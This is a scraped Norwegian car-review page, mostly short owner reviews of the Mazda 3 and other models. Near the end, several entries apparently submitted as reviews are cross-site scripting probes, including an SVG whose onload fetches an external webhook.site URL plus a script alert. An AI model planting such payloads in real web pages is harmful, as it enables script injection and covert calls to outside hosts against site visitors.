Vurdert av Truls
Flere vurderinger fra samme modell
Mazda 3 (2020)
Bilen brukte nylig sinnsykt lave 0.36l på mila ved langkjøring (testet over en strekning på 640 km). Til daglig ligger den på ca. 0,5l pr. mil. Dette gjør økonomien i det totale bilholdet ekstre
Mazda 3 (2020)
Kjempe bra bil kjøpte heilt nye Mazda3 sedan 2020 model.er kjempe fornøyd med bilen.
Mazda 3 (2020)
Bilen bruker 0.42l på mila ved langkjøring (testet over en strekning på 640 km) og er ellers vanskelig å få til å bruke mer enn ca. 0.5l på mila, og er som nybil meget lavt priset (fra 310.000
Mazda 3 (2019)
En god bil med masse sikkerhetsfunksjoner. Bruker litt mer drivstoff enn andre i samme merke. Ellers er jeg veldig fornøyd fra 2019 til i dag.
Mazda 3 (2018)
Meget godt utstyrt, fint utseende og flott kvalitet. Blir nok Mazda med bensinmotor når den skal byttes ut neste år. Heldigvis har de nye mer hestekrefter.
Mazda 3 (2018)
Veldig fornøyd. Beste bilen jeg har hatt - men det skulle ikke så mye til siden jeg har kjørt tysk bil tidligere. Både BMW, VW og Audi er forferdelig biler - at de ble tatt for juks var ikke overr
Mazda 3 (2018)
Vi er utrolig fornøyd, masse bil og motor for pengene!
Mazda 3 (2017)
Nydelig bil. Storfornøyd!
Mazda 3 (2016)
En veldig god bil, har kjørt hele sørnorge på tvers noen ganger, trekk for litt lat automat kasse, men pleier å bruke F1 hendelene bak rattet til å gire ned før forbikjøringer. Aldri vært noe
Mazda 3 (2015)
Mazda er et «lite» bilmerke som tørr å gå sine egne veier. Når andre bilmerker går for 1 liter og turbo, har Mazda 2 liter selvpustende med bra drag. Kvalitet og lite feil gjør at det blir Maz
Mazda 3 (2015)
Veldig fornøyd , kanskje litt hjulstøy ved motorveifart
Mazda 3 (2015)
Meget god bil som er veldig undervurdert i markedet. Jeg har rundet 100 000 med bilen nå. Ingen feil har oppstått og byttet bremser foran etter 80 000. Bak er de fine enda. Jeg stortrives hver gang
Mazda 3 (2015)
Eier Mazda 3, 2015 mod. 2.2 l Combi,aut. med adaptiv CV. Strålende fornøyd, gode kjøreegenskaper, problemfri og sportslig utseende.
Mazda 3 (2014)
Super bil med ein dritt motor dei første 2013-2014 mod
Mazda 3 (2014)
Bilen har en del fordeler som at den ikke har turbo og register reim som kan ryke. Dette er den beste og mest driftssikre bilen jeg noen gang har hatt. Har vurdert å bytte til elbil snart, men jeg er
Flere vurderinger
Mitsubishi Outlander PHEV (2016)
En bil som har vært brukt til store og små transporter. Meget pålitelig sommer som vinter. Vil beholde bilen i mange år.
Citroën DS3 (2012)
Billog liten sportsbil. Jeg vil tro at dette må være en veldig gøy førstebil for mange. Den går godt om mann får bensin 156hk utgaven den ser bra ut og den ligger godt på veien.
Volvo XC40 (2024)
Veldig fornøyd med bil, komfort og spesielt støy som er lavere enn de fleste biler i denne klasse/ pris. Ingen problemer med bilen!
Skoda Enyaq (2025)
Brukt som drosje, har per nå 75000km. Veldig stor oppgradering å få batterivarme. Regenerativ bremsing anbefales ikke på vinterføre. Får minus på forbruk da bilen gir meg 270-330km på kaldeste
Volvo EX30 (2025)
Mekanisk fin bil men med et makkverk av software som er full av feil. Se Volvo ex30 forum for tidenes lengste og gjentakende feil rapporter. Volvo ser ikke ut til å være interessert å ordne opp des
Skoda Enyaq (2023)
Syns utseende å bilen er tøff, ellers kan jeg ikke sa hva den skal være bedre på enn sine konkurrenter. Sitte stillingen passer meg dårlig, men fruen liker det. Pluss at den har soltak Elendi
Mazda CX-5 (2013)
Bilens største utfordring med skyactive motor er relatert til partikkelfilter, koksing av inntaksmanifold og tett sumpfilter, som kan lede til havari. Annet er utkobling av turbo på grunn av feil ve
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>